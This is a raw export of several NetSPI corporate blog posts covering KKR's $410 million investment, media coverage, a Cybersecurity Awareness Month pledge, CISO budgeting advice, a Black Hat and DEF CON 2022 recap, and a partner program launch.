[post_date] => 2022-10-05 09:00:00
[post_date_gmt] => 2022-10-05 14:00:00
[post_content] =>
On October 5, NetSPI was featured in the SecurityWeek article called KKR Boosts NetSPI Stake with $410 Million Investment. Read the preview below or view it online.
The new funding gives Minneapolis-based NetSPI an extended runway to compete and find profits in the fast-growing attack surface management business. NetSPI offers a cloud-based delivery model that allows customers to perform always-on continuous testing to monitor their attack surface and execute attack scenarios based on real-world attacker tactics, either as a single attack technique or a full attack chain using one pre-built playbook.
In December 2020, NetSPI acquired Silent Break Security, a Utah-based security testing firm that offers network and application testing, red teaming, and adversary simulation. Terms of that deal were not disclosed.
NetSPI says it has found traction with a suite of offensive security solutions – Attack Surface Management, Penetration Testing as a Service (PTaaS), and Breach and Attack Simulation – to help businesses uncover critical security gaps, minimize risk, and reduce the likelihood of a security incident.
The NetSPI funding for continuous attack surface management technology comes just days after the U.S. government’s cybersecurity agency CISA issued mandatory instructions for federal agencies to improve automated asset discovery and vulnerability detection capabilities.
According to the CISA, the binding operational directive is meant to help federal agencies improve their cybersecurity management capabilities by gaining visibility into all assets in their networks and the vulnerabilities impacting them.
Federal agencies have been given six months to identify network addressable IP-assets in their environments, along with the associated IP addresses (hosts), as well as to discover and report suspected vulnerabilities on those assets, including misconfigurations, outdated software, and missing patches.
The government’s push is sure to attract more attention to the attack surface management category, which has grown in importance to solve problems with vulnerability and patch management, especially for software and other assets that are exposed to the internet. The technology is meant to address gaps in point-in-time penetration testing and vulnerability management and is a highly competitive category with multiple startups jostling for market share.
[post_title] => SecurityWeek: KKR Boosts NetSPI Stake with $410 Million Investment
[post_excerpt] => NetSPI was featured in the Security Week article called KKR Boosts NetSPI Stake with $410 Million Investment.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => security-week-kkr-boosts-netspi-investment
[to_ping] =>
[pinged] =>
[post_modified] => 2023-01-23 15:10:10
[post_modified_gmt] => 2023-01-23 21:10:10
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=28559
[menu_order] => 73
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[18] => WP_Post Object
(
[ID] => 28561
[post_author] => 91
[post_date] => 2022-10-05 09:00:00
[post_date_gmt] => 2022-10-05 14:00:00
[post_content] =>
On October 5, NetSPI was featured in the SiliconANGLE article called Cybersecurity provider NetSPI nabs $410M investment from KKR. Read the preview below or view it online.
+ + +
Cybersecurity services and software provider NetSPI LLC today announced that it has received $410 million in growth funding from private equity firm KKR.
NetSPI will use the capital to grow its workforce, develop new technologies and expand its international business operations. The company added that a part of the funding from KKR will go toward recapitalizing its first institutional investor, private equity firm Sunstone Partner. NetSPI previously raised $90 million last May from KKR and Ten Eleven Ventures.
Minneapolis-based NetSPI helps companies find and fix vulnerabilities in their technology infrastructure. NetSPI can launch a simulated cyberattack against an organization’s network to find potential weak points. In addition to uncovering vulnerabilities, such simulated cyberattacks enable companies to measure how quickly they can resolve a network breach and find opportunities for improvement.
On October 5, NetSPI was featured in The Business Journal's article called Cybersecurity company NetSPI raises $410M from KKR. Read the preview below or view it online.
+ + +
NetSPI, a Minneapolis-based cybersecurity company, announced Wednesday that it has raised $410 million in growth funding from investment firm KKR.
The new financing adds to previous funds the New York City-based investment firm had invested in the company last year alongside cybersecurity-focused venture capital firm Ten Eleven Ventures, a deal that totaled $90 million, the Business Journal reported.
[post_title] => The Business Journal: Cybersecurity company NetSPI raises $410M from KKR
[post_excerpt] => NetSPI was featured in The Business Journal's article called Cybersecurity company NetSPI raises $410M from KKR.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => the-business-journal-netspi-raises-410m
[to_ping] =>
[pinged] =>
[post_modified] => 2023-01-23 15:10:10
[post_modified_gmt] => 2023-01-23 21:10:10
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=28563
[menu_order] => 74
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[20] => WP_Post Object
(
[ID] => 28488
[post_author] => 91
[post_date] => 2022-10-05 06:35:00
[post_date_gmt] => 2022-10-05 11:35:00
[post_content] =>
New investment to fuel the offensive security leader’s record-breaking growth and innovation pipeline.
Minneapolis, MN – NetSPI, a leader in enterprise penetration testing and attack surface management, today announced that global investment firm KKR is increasing its investment in the company with $410 million in new funding. The growth investment validates NetSPI’s significant outperformance since KKR’s initial investment in May 2021 and will support NetSPI’s continued technology innovation, talent acquisition, and global expansion, as well as recapitalizing NetSPI’s first institutional investor Sunstone Partners.
Enterprises rely on NetSPI’s comprehensive suite of offensive security solutions – Attack Surface Management, Penetration Testing as a Service (PTaaS), and Breach and Attack Simulation – to uncover critical security gaps, minimize risk, and reduce the likelihood of a security incident. Founded in 2001, NetSPI leverages its ‘technology powered, human delivered’ penetration testing approach to improve the security of organizations globally, including the top financial institutions, largest cloud providers, leading healthcare organizations, and many of the Fortune 500.
“We are excited to double down on our investment in NetSPI to help build a differentiated leader in offensive cyber security,” said Jake Heller, Partner and Head of KKR’s Technology Growth team in the Americas. “We have been very impressed by the performance of the company and the exceptional execution by Aaron and his team over the past 18 months. We believe this is just the beginning of what we can accomplish together.”
“We’re both grateful and proud of the industry disruption we drove during our partnership with Sunstone Partners,” said Aaron Shilts, CEO at NetSPI. “As we look forward to this next chapter, NetSPI will continue to challenge the status quo in offensive security. With KKR’s support, we are well positioned to amplify our success building the best teams, developing new technologies, and delivering excellence, so that the world’s most prominent organizations can innovate with confidence.”
NetSPI has consistently outpaced growth forecasts. Over the past five years, the company has grown its revenue five-fold, exceeding 50 percent organic revenue growth in 2021 and 61 percent growth in 2022 to date. Key growth drivers include:
NetSPI’s Penetration Testing as a Service (PTaaS) delivery model, where human ingenuity and novel technologies intersect to create consistent, scalable, and efficient pentesting results.
The acquisition of Silent Break Security, which added additional offensive testing expertise and talent depth, along with innovative technologies that have expanded NetSPI’s global offerings.
The introduction of Attack Surface Management to identify and protect the unknown with continuous penetration testing and manual exposure triaging.
The NetSPI University training program which enables NetSPI to develop the next generation of cybersecurity talent through formal curriculum and hands-on labs and mentorship, resulting in the most comprehensive training and certification program in security testing.
Continuous advancement and innovation across all three technology platforms – ASM, Resolve, and AttackSim – to enable teams to deliver more accessible and impactful results.
Establishing strong teams in Canada, EMEA, and India as key component of the company’s global expansion efforts.
NetSPI’s ability to recruit and retain top industry talent. The company recently reached the milestone of more than 400 offensive security professionals globally.
“NetSPI continues its trajectory of strong, and accelerating, organic growth and profitability and we are excited about the opportunity to continue this momentum with further investments in technology, people, geographical expansion and strategic acquisitions,” said Ben Pederson, a Director on KKR’s Technology Growth team. “Penetration testing is an increasingly important and strategic aspect to any enterprise’s security posture and we believe NetSPI is a category defining player in the space through their best-in-class technology and PTaaS delivery model. We look forward to supporting NetSPI’s continued growth on a global scale.”
“Following our investment in 2017, we’ve had the pleasure of working closely with NetSPI’s team as the company evolved and established itself as the high-growth, profitable security leader it is today," said Gustavo Alberelli, Сo-Founder & Managing Partner at Sunstone Partners. “This transaction demonstrates that even during these turbulent times cybersecurity market leaders such as NetSPI will remain highly valuable – especially those providing mission critical solutions to global enterprise customers. We’ve enjoyed having KKR as co-investors since 2021 and look forward to watching NetSPI’s continued success in the future."
This investment follows NetSPI’s most recent $90 million funding round from KKR and cybersecurity specialist investor Ten Eleven Ventures and comes from KKR’s Technology Growth strategy, which is dedicated to growth equity investment opportunities in leading high-growth technology companies in North America, Europe and Israel.
The transaction will close by the end of 2022, subject to customary regulatory approvals. Goodwin Procter LLP advised NetSPI on the transaction and Latham & Watkins LLP advised KKR.
About NetSPI
NetSPI is the leader in enterprise penetration testing and attack surface management. Today, NetSPI offers the most comprehensive suite of offensive security solutions – attack surface management, penetration testing as a service, and breach and attack simulation. Through a combination of technology innovation and human ingenuity we help organizations discover, prioritize, and remediate security vulnerabilities. For over 20 years, NetSPI’s global cybersecurity experts have been committed to securing the world’s most prominent organizations, including nine of the top 10 U.S. banks, three of the five largest healthcare companies, the leading cloud providers, and many of the Fortune® 500. NetSPI is a KKR and Ten Eleven Ventures portfolio company and is headquartered in Minneapolis, MN, with global offices across the U.S., Canada, the UK, and India. For additional information, visit www.netspi.com or follow us on LinkedIn or Twitter.
About KKR
KKR is a leading global investment firm that offers alternative asset management as well as capital markets and insurance solutions. KKR aims to generate attractive investment returns by following a patient and disciplined investment approach, employing world-class people, and supporting growth in its portfolio companies and communities. KKR sponsors investment funds that invest in private equity, credit and real assets and has strategic partners that manage hedge funds. KKR’s insurance subsidiaries offer retirement, life and reinsurance products under the management of Global Atlantic Financial Group. References to KKR’s investments may include the activities of its sponsored funds and insurance subsidiaries. For additional information about KKR & Co. Inc. (NYSE: KKR), please visit KKR’s website at www.kkr.com and on Twitter @KKR_Co.
About Sunstone Partners
Sunstone Partners is a growth-oriented private equity firm that makes majority and minority investments in technology-enabled services and software businesses. Recently recognized as one of Inc.’s 50 founder-friendly private equity firms for entrepreneurs, the firm seeks to partner with exceptional management teams, often as their first institutional capital partner, to help accelerate organic growth and fund acquisitions. Founded in 2015, the firm has $1.7 Billion of committed capital. For more information, visit www.sunstonepartners.com.
[post_title] => NetSPI Raises $410 Million in Growth Funding from KKR
[post_excerpt] => NetSPI announced that global investment firm KKR is increasing its investment in the company with $410 million in new funding. Read this press release to learn more.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => netspi-raises-410-million-growth-funding-kkr
[to_ping] =>
[pinged] =>
[post_modified] => 2023-01-23 15:10:13
[post_modified_gmt] => 2023-01-23 21:10:13
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=28488
[menu_order] => 81
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[21] => WP_Post Object
(
[ID] => 28479
[post_author] => 91
[post_date] => 2022-09-29 09:00:00
[post_date_gmt] => 2022-09-29 14:00:00
[post_content] =>
Penetration testing leader joins list of organizations empowering individuals and businesses to bolster proactive cybersecurity measures.
Minneapolis, MN — NetSPI, the leader in enterprise penetration testing and attack surface management, has signed on as an official Champion of Cybersecurity Awareness Month 2022, an annual initiative held each October to promote cybersecurity awareness and best practices. The Cybersecurity Awareness Month Champions Program is a collaborative effort among businesses, government agencies, colleges and universities, associations, nonprofit organizations, and individuals committed to the growing importance of cybersecurity in society.
Cybersecurity Awareness Month is co-led by the National Cybersecurity Alliance and the Cybersecurity and Infrastructure Agency (CISA). This year’s campaign theme is “See Yourself in Cyber,” demonstrating that while cybersecurity may seem like a complex subject, ultimately, it’s really about people.
“Technology cannot solve our greatest cybersecurity challenges – at least, not on its own. People are our greatest asset in providing security for individuals, organizations, and the nation,” said Heather Crosley, VP of People Operations at NetSPI. “Empowering people to make smart decisions, supporting limited resources with technology innovation, and fostering the next generation of skilled cyber talent are three critical ways we can combat sophisticated cybersecurity threats in both the private and public sectors.”
To encourage individuals to explore a career in penetration testing and help lessen the current skills gap, NetSPI developed NetSPI University (NetSPI U), an extensive entry-level training program where candidates gain a baseline skill set to execute web application and external network penetration tests. Led by NetSPI’s own expert pentesters, NetSPI U features classroom-based learning, hands-on labs, and opportunities to shadow some of the most brilliant minds in cybersecurity. Trainees also can contribute to new and innovative pentesting tools, techniques, and methodologies.
Crosley added: “The industry needs people who are self-starters, curious, eager to learn, and want to make a difference in society at large. From there, the rest can be developed by supporting career-oriented initiatives like NetSPI U.”
NetSPI is the leader in enterprise penetration testing and attack surface management. Today, NetSPI offers the most comprehensive suite of offensive security solutions – attack surface management, penetration testing as a service, and breach and attack simulation. Through a combination of technology innovation and human ingenuity NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. For over 20 years, its global cybersecurity experts have been committed to securing the world’s most prominent organizations, including nine of the top 10 U.S. banks, three of the five largest healthcare companies, the leading cloud providers, and many of the Fortune® 500. NetSPI is headquartered in Minneapolis, MN, with global offices across the U.S., Canada, the UK, and India. Follow us on Facebook, Twitter, and LinkedIn.
About Cybersecurity Awareness Month
Cybersecurity Awareness Month is designed to engage and educate public- and private-sector partners through events and initiatives with the goal of raising awareness about cybersecurity to increase the resiliency of the nation in the event of a cyber incident. Since the Presidential proclamation establishing Cybersecurity Awareness Month in 2004, the initiative has been formally recognized by Congress, federal, state and local governments and leaders from industry and academia. This united effort is necessary to maintain a cyberspace that is safer and more resilient and remains a source of tremendous opportunity and growth for years to come. For more information, visit staysafeonline.org/cybersecurity-awareness-month/
About National Cybersecurity Alliance
The National Cybersecurity Alliance is a non-profit organization on a mission to create a more secure, interconnected world. We advocate for the safe use of all technology and educate everyone on how best to protect ourselves, our families, and our organizations from cybercrime. We create strong partnerships between governments and corporations to amplify our message and to foster a greater “digital” good. National Cybersecurity Alliance’s core efforts include Cybersecurity Awareness Month (October); Data Privacy Week (Jan. 24-28th); and CyberSecure My Business™, which offers webinars, web resources and workshops to help businesses be resistant to and resilient from cyberattacks. For more information, please visit https://staysafeonline.org.
It’s time to tackle the elephant in the room. The often awkward and uncomfortable conversation every CISO must hold with their board and executive teammates around this time of year. That’s right – we’re talking cybersecurity budget and metrics.
‘Tis the season for planning your cybersecurity activities. With rising threats and increasing breach-related financial repercussions, it’s likely many of us will need to communicate the need for additional dollars and resources. And this is no easy feat.
Podcast host and NetSPI Managing Director Nabil Hannan asked three experienced CISOs — Cecil Pineda (R1 RCM), Rob LaMagna-Reiter (Hudl), and Samir Sherif (Imperva) — for tips on measuring security ROI and how to communicate budgeting needs. Here is what they had to say.
What metrics are effective when presenting your cybersecurity budget needs to the board or C-Suite?
Cecil Pineda, SVP/CISO at R1 RCM: Today, we're seeing a lot of usable metrics. Some organizations like to look at the negatives. You could highlight all the incidents that you've experienced, how many risks you have in a risk register, how many non-compliant items are in your compliance programs, and how many risks are critical, medium, or low.
For many years, I felt fear, uncertainty, and doubt. This can be useful, but it doesn't always help me communicate my needs. My leadership team was in on our security program, asking where our competitors are at. How does our program benchmark against others in our industry? Where do we want our scores to be?
Maturity metrics, particularly the NIST Cyber Security Framework (CSF) metrics and the Capability Maturity Model Integration (CMMI) framework, have helped me measure my program. For example, in the healthcare industry, the average CSF score is about 2.8 or 2.9. If you start your program at 2.3, you have to think about how do I get to 2.8? Though, ideally, you want to target higher than 2.8 so that you're aiming above the industry average.
Then, identify all the opportunities to get there. It could be people, it could be processes, or it could be technologies. These are the things that we need to improve.
Samir Sherif, CISO at Imperva: My focus has always been less about specific data points. If you're running one program, it’s less about getting numbers off that program to show value. For example, if it's a vulnerability management program, it's not just about reducing vulnerabilities.
How is security making a difference in generating more revenue for the business? How is that adding value to improve customer communications or reduce risks for the organization? That's what they really care about and look for.
At the end of the day, we are risk leaders. That's all we are. But we have to have the same kinds of conversation as the IT and engineering leads might around providing value and building efficiency over time.
So, the metrics I've leveraged is a combination of showing risk data, but also resiliency data. It's a combination of how my capabilities, programs, and the leaders that work for me, are delivering to help move the needle and enable the business to move faster and grow. And that's what really resonates with senior leaders and the board. Ultimately, you end up getting more budget to build upon that.
Rob LaMagna-Reiter, CISO at Hudl: I've searched and searched, and to date, I've not found a single, consistent, reliable metric that can make the case for more budget or showcase ROI.
With that said, there are several areas that you can consider. First off, everything is personalized. But I'll try to provide some examples of tactics I've used in the past that start very generally, and over time, you can tweak those to your specific business.
Let's say you're starting out and you're convinced that you're seeing an underinvestment in information security. There are plenty of benchmarks out there, everything from the security dollar spent per full-time employee, security budget as a percentage of the IT budget, security budget as a percentage of revenue, and so forth.
You can use those low, moderate, or high averages as benchmarks to showcase where you fall along that path. There's also something called the “cybersecurity poverty line” that was illustrated many years ago. It showcases organizational revenue and resources and helps illustrate where along that line organizations possibly are investing versus where they shouldn't be investing.
You can also use business drivers, such as acquisitions. You can formulate a weighted average cost per IT asset required for security. Then, as the business grows, security is already an assumed cost of doing business. Most importantly, I found that it always needs to be aligned with that business growth in the strategic objective.
These are a few ways to get started. As you're working through your program, it is important to understand what business leaders care about. Have you enabled my availability and uptime? Have you shown improvement year over year? There are always parts of the business that are growing faster than the overall weighted average of either revenue or top line growth. You need to be increasingly aware of the scope of those situations and how it impacts security.
Remember, it's not that the board and leadership team doesn't want to spend on security, they just want to know that the resources and the budget will enable the growth in business resiliency.
Many of the examples I’ve shared have dollar value components, but it requires a lot of analysis and partnership with business units to get to an agreed-upon state so we can showcase both budget asks that are rooted in reality, as well as ROI. I wish there was an easy figure or benchmark I can provide you, but everything is very personal to your business.
It requires a solid relationship with not just your CFO leadership team but across all of your peers and board to make sure that we're all on this journey together. We're not going to get everything we want every single year. But if we're making incremental and iterative improvements in the right direction, you've done your job as a security leader.
Beyond metrics and objective data, are there other tactics that work well for you when communicating your cybersecurity budgeting needs?
Cecil Pineda: There are many ways to communicate without data. I’ve learned this from many great CISOs before me. One of the most effective tools in our arsenal is storytelling. You can tell a really good story, but you have to align it to your leaders.
Today, a lot of our board of directors and senior leadership are tech savvy. We see it in the news. They know all the risks and threats and all these security controls that are at our disposal. Having a good story to tell that includes here's where we are and here are some of our challenges is important.
There are so many things that can’t make it into a slide deck. When I'm presenting, I always try to make sure that I tell the story behind those metrics. Those stories are very powerful. When I was a first-time CISO, I'll be honest with you, I didn't know how to tell a story. I was just relying on data always. But it wasn't enough.
As I went on to different companies and different roles, I’ve learned how to craft a strong story. I recently learned that my CIO is actually a former CISO and an academic. I listen to him and I watch him. I'm still amazed how he can tell a really good story and be able to drive people together and gain support with stories.
Samir Sherif: Before you even build any ROI models or metrics, make friends with your CFO and CFO teams. At the end of the day, they're the ones who are going to help you keep the lights on and also make sure that you're budgeting and spending appropriately.
Being at the table and not thinking that cybersecurity is a priority everybody needs to worry about is concerning. Just like an athlete needs to worry about their health, cyber professionals need to worry about the health of their organization. But there's also performance demand, right?
Being a part of a team that can have a good conversation around what's the greater objective and strategy is key. Helping influence that strategy is important to be successful in the field that we're in.
Rob LaMagna-Reiter: I like to take real business workflows or issues in the organization and help paint a picture and showcase what operations would be like if my ask, or if an above-average project, is approved.
It’s about connecting those crown jewels in the business to something that leadership knows is tangible. They want to be able to see the benefits and efficiencies. You have to remember, at the end of the day, nobody cares about cybersecurity or information security as much as we do. They do care, but it's not their day-to-day as it is ours.
It’s about storytelling versus fear-mongering. Over coffee or lunch, get to know your leadership team’s motivations. And don't always assume the worst case scenario. Always approach them with empathy.
Showcase cybersecurity against peers within our verticals or organizations of other similar sizes. Tie it to the business initiatives and showcase why it is necessary and clearly state what your recommendations are.
Something that I've learned over time is you never want to leave with only one recommendation. You always want to offer leadership with, at minimum, two options. One is obviously going to be your preferred path. But leadership will want to see that you've thought through some of the ramifications. Get creative. There are always going to be trade-offs. Leadership will appreciate the time and effort and will take your recommendation to heart and open it up for discussion. Tunnel vision can sometimes lead to less budget getting approved.
Listen to the full episodes of the Agent of Influence podcast online, or wherever you listen to podcasts:
[post_title] => CISO Perspectives: Cybersecurity Budgeting Edition
[post_excerpt] => We asked three experienced CISOs for advice on cybersecurity metrics and how to communicate budgeting needs. Here’s what they had to say.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => ciso-perspectives-cybersecurity-budgeting
[to_ping] =>
[pinged] =>
[post_modified] => 2023-01-23 15:10:14
[post_modified_gmt] => 2023-01-23 21:10:14
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=28454
[menu_order] => 84
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[23] => WP_Post Object
(
[ID] => 28255
[post_author] => 91
[post_date] => 2022-08-26 11:03:13
[post_date_gmt] => 2022-08-26 16:03:13
[post_content] =>
NetSPI was named a top penetration testing provider in GRC Outlook's Top 10 Penetration Testing Providers 2022. Read the preview below or view it online.
+++
Ever since cybersecurity has been expanding its reach with innovations, there has also been an increasing number of cyber-attacks. This means, that as technology is expanding, cybercriminals are also increasing their potential and power. The recent global shutdown and remote work culture have greatly affected the increase in cybersecurity threats too. A lot of businesses rely on penetration testing tools to enhance their security as well as to find possible penetrations in their security architecture.
Today, penetration testing practices and solutions have evolved from being a completely manual and tedious process to a more automated and highly propagated process. With the advent of artificial intelligence and machine learning, penetration testing solutions are also improving dramatically. AI and ML not only gather all the information automatically but also analyze it and determine different courses of action, thus significantly improving the penetration testing results. AI and ML could help the pen tester understand the results of the scans by analyzing them and removing noise, taking into consideration information gathered from the previous phase combined with threat intelligence.
However, as numerous solutions and providers are existing in the industry, businesses are finding it a tough time to choose the right solutions provider that exactly fits their unique requirements of businesses. That’s why we’ve developed this special edition on Penetration Testing Solution Providers 2022. This special edition features some of the most innovative solution providers selected by our panel of researchers, editors, CTOs and cybersecurity professionals.
On July 20, NetSPI was listed as a top vendor in eSecurity Planet's Top 20 Breach and Attack Simulation (BAS) Vendors for 2022. Read the preview below or view it online.
+++
Breach and attack simulation (BAS) remains a newer IT security technology, but its capabilities are increasingly essential to vigilance in a world of zero-day threats.
BAS can automatically spot vulnerabilities in an organization’s cyber defenses, akin to continuous, automated penetration testing. More than just pen testing and red team insights, BAS solutions often recommend and prioritize remediation to maximize security resources and minimize cyber exposure.
A few years into BAS’s entry into the cybersecurity marketplace, vendors range from startups to fast-growing mid-sized companies and vulnerability-focused enterprise companies. Some consolidation has already taken place, but more will come and the race to obtain a sustainable market share is far from over.
As the market develops, several vendors refer to advanced BAS solutions as security validation. Artificial intelligence and machine learning are an increasingly important part of this market, as automated cybersecurity tools need to be able to adjust as new threats emerge.
Top Breach & Attack Simulation Solutions
This roundup dives into the best in the BAS market, from the top-tier solutions to companies on the rise and honorable mentions.
[post_title] => eSecurity Planet: Top 20 Breach and Attack Simulation (BAS) Vendors for 2022
[post_excerpt] => On July 20, NetSPI was listed as a top vendor in eSecurity Planet's Top 20 Breach and Attack Simulation (BAS) Vendors for 2022.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => esecurity-planet-top-20-breach-and-attack-simulation-2022
[to_ping] =>
[pinged] =>
[post_modified] => 2023-01-23 15:10:18
[post_modified_gmt] => 2023-01-23 21:10:18
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=28254
[menu_order] => 94
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[25] => WP_Post Object
(
[ID] => 28264
[post_author] => 91
[post_date] => 2022-08-23 08:30:00
[post_date_gmt] => 2022-08-23 13:30:00
[post_content] =>
With another year at Black Hat USA and DEF CON behind us, it’s time to reflect on some of the top takeaways, trending themes, and noteworthy best practices overheard across Vegas. In case you missed it, here’s what we were up to and what caught our attention at this year’s conferences:
NetSPI’s Nick Landers Briefs Black Hat Attendees on the Latest Kerberos Research
NetSPI’s Head of Adversarial R&D Nick Landers presented his latest research on Kerberos alongside James Forshaw, security researcher at Google Project Zero.
Nick and James’ research revealed that while Kerberos should be the recommended long-term solution for network authentication in Windows networks, it shouldn't be considered more secure than its predecessors. What they uncovered is that Kerberos is a complicated protocol, and there has been little deconstruction on how a local machine handles it. This allowed them to expose several bugs within it.
A key takeaway Nick shared is that security teams must look to develop a fundamental understanding of each protocol and how they come into play. Teams shouldn't just look for vulnerabilities; looking for a deeper understanding of how a protocol works will allow teams to better understand its risk locations.
Big picture, Nick hopes to bring further awareness to Kerberos security challenges and “hopes the talk will spur security and network administrators to brush on their Kerberos knowledge to better harden their systems.” The session slides are now available, or read more in Dark Reading here: “Abusing Kerberos for Local Privilege Escalation.”
The Launch of New, Open-Source Tools & Greater Industry Collaboration
On the first day of Black Hat, we announced the release of two new open-source penetration testing tools developed by NetSPI Senior Director Scott Sutherland. The tools, PowerHuntShares and PowerHunt, help defense, identity and access management (IAM), and security operations center (SOC) teams discover vulnerable network shares and improve detections.
PowerHuntShares is focused on identifying shares configured with excessive permissions and providing data insight to understand how they related to each other, when they were introduced into the environment, who owns them, and how exploitable they are.
PowerHunt is a threat hunting framework that can be used to quickly collect artifacts commonly associated with malicious behavior. While it calls out suspicious artifacts and statistical anomalies, its greatest value is simply producing data that can be used by other tools during threat hunting exercises.
These new tools emphasize the importance of more open-source collaboration in the information security community. Working together to solve some of the industry's most pressing problems was a powerful theme at this year’s Black Hat, not only with the release of Scott’s tools, but also with the announcement of The Open Cybersecurity Schema Framework, an open project to develop a single, open standard for sharing data. We applaud and support the Open Cybersecurity Schema Framework as a step in the right direction to advance community collaboration.
Penetration Testing Services Continue to Be a Top Priority
As cybersecurity budgets are scrutinized, penetration testing continues to be top of mind for Black Hat attendees. In fact, from our conversations at the NetSPI booth and throughout the show floor, many security teams are looking to complete penetration testing exercises before the end of the year and recognize it as a top priority in their security strategy.
From a managed security service provider (MSSP) perspective, they are handling an increasing amount of requests from their customers asking for penetration testing, as they realize the value such exercises can bring to an organization when strengthening its security posture.
While discussing penetration testing services, many attendees on the show floor agreed that there’s an increased focus on continuous testing, and the one unique differentiator in any security service, including pentesting, is the human element – talented people on the front lines working to ensure organizations are properly protected and filling the gaps that tools leave behind. We discuss this topic in one of our recent blog posts: Technology Cannot Solve Our Greatest Cybersecurity Challenges, People Can.
Cloud Security Takes Center Stage as Threats Skyrocket
At DEF CON's Cloud Village, NetSPI Senior Director Karl Fosaaen provided a comprehensive review of the security pitfalls within Azure Automation accounts from his perspective as a cloud pentester. In this presentation, Karl also shared an overview of Azure's permissions model, including security principles and roles, to help people unfamiliar with the topic gain a better foundational knowledge of it.
Overall, the presentation dissected how Automation Accounts may be targeted by attackers and pentesters alike, highlighting a range of vulnerabilities and attacks. Karl left the audience with a plethora of potential Automation Account vulnerabilities to find and secure in their own environments as cloud security threats continue to expand. The session slides are now available here.
In addition to Karl’s talk at DEF CON 30, Thomas Elling, Senior Director of the cloud pentesting practice at NetSPI, joined industry experts from Immuta, OneSpan, Code42, Netskope, and Obsidian in a virtual media panel hosted by Inkhouse in the week prior to Black Hat USA. During the talk, the group outlined the top cloud security threats affecting organizations worldwide, as well as what’s in store for cloud security in the years to come. You can read up on the panel’s main takeaways in this SDxCentral piece: Decentralization Haunts Security, Cloud Transitions.
More Diversity and Inclusion Necessary in the Cybersecurity Industry
At DEF CON’s Girls Hack Village, NetSPI Managing Security Consultant Melissa Miller explored a prevalent topic for women across many industries – imposter syndrome.
During the presentation, Melissa spoke about her personal experiences as a woman navigating a career in cybersecurity and discussed the characteristics of a healthy work environment. She also shared tips on how to spot imposter syndrome, along with immunization strategies and key techniques to identify your strengths and weaknesses and use that information to pursue and achieve your career goals.
Melissa also participated in a panel around diversity in the cybersecurity industry. In this talk, Melissa highlighted that there needs to be more openness around the concept of variety, understanding of people’s differences, and an earnestness to gain different perspectives to lead to more creative problem solving.
Melissa also stressed that diversifying the cybersecurity industry would reduce the 'boys club' stigma that many people associate with it, helping to encourage diverse people to pursue cybersecurity-related degrees, creating better growth and diversity in the cybersecurity workforce as a result.
Both of these presentations echoed a major sentiment at Black Hat USA and DEF CON 30 this year around creating more diversity and inclusivity in the cybersecurity industry, especially as recruiting talent remains a key challenge for the cybersecurity industry.
Live Social Engineering at DEF CON 30
NetSPI consultants enjoyed the social engineering village at DEF CON 30 and where NetSPI’s on-site social engineering lead Dalin McClellan volunteered. At the village, they cold-called businesses in-real time to see if they could get them to share sensitive information. In one instance, the employee disclosed information around building security, where the cameras were, how badging worked, where employees kept their belongings on shift, and more.
In addition to the news announced and rumblings overheard at Black Hat, our team also noticed that Black Hat and DEF CON were back in full swing, with a crowded show floor, bustling briefing halls, and the industry buzzing in Las Vegas once again.
Amid the crowds, vendors tried to stand out on the show floor with some attention-grabbing activities, like a boxing ring. Several booths had the words “attack surface” front-and-center, proving that Attack Surface Management has become an increased priority for security teams.
With these major security events now behind us, it’s important for the security industry to continue raising awareness and spreading education about some of the important topics discussed on the show floor. As cybercriminals become more sophisticated and well-funded and organizations prioritize cybersecurity, we’ll need continuous collaboration in the industry to better bolster security measures, as well as increase diversity to help amplify and expand defense teams.
What major topics caught your attention at Black Hat or DEF CON? Share them with us on Twitteror LinkedIn.
[post_title] => Top Security Takeaways from Black Hat USA 2022 and DEF CON 30
[post_excerpt] => Read about top security takeaways from Black Hat USA and DEF CON.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => top-security-trends-from-black-hat-def-con
[to_ping] =>
[pinged] =>
[post_modified] => 2023-01-23 15:10:19
[post_modified_gmt] => 2023-01-23 21:10:19
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=28264
[menu_order] => 95
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[26] => WP_Post Object
(
[ID] => 28282
[post_author] => 91
[post_date] => 2022-08-19 16:34:00
[post_date_gmt] => 2022-08-19 21:34:00
[post_content] =>
On August 19, NetSPI was featured in Channel Futures' article NetSPI Unleashes New Partner Program. Read the preview below or view it online.
+++
NetSPI, a provider of enterprise penetration testing and attack surface management, this week launched its NetSPI Partner Program.
The global program equips channel and technology partners with pentesting tools, services and talent, bolstering security worldwide. Partners can offer end users NetSPI’s vulnerability management technologies and human-delivered offensive security services. That allows both the partner and NetSPI to expand product and service offerings, further develop customer relationships and enter new markets.
Additionally, last month NetSPI joined the AWS Marketplace. That simplifies the procurement process for enterprise organizations with existing AWS relationships by allowing them to purchase NetSPI’s offerings directly via the marketplace.
Lauren Gimmillaro is NetSPI’s vice president of business development and strategic alliances.
“As today’s global attack surface evolves and cybercriminals become more sophisticated in nature, it’s critical to provide end users with the tools, services and skill sets they need to take an offensive approach to security,” she said. “Centered around our customer-first approach, the NetSPI Partner Program will allow our team to extend our world-class pentesting capabilities to a variety of diverse and trusted partners, strengthening organizations’ cyber security efforts across the globe.”
The program includes two partner types:
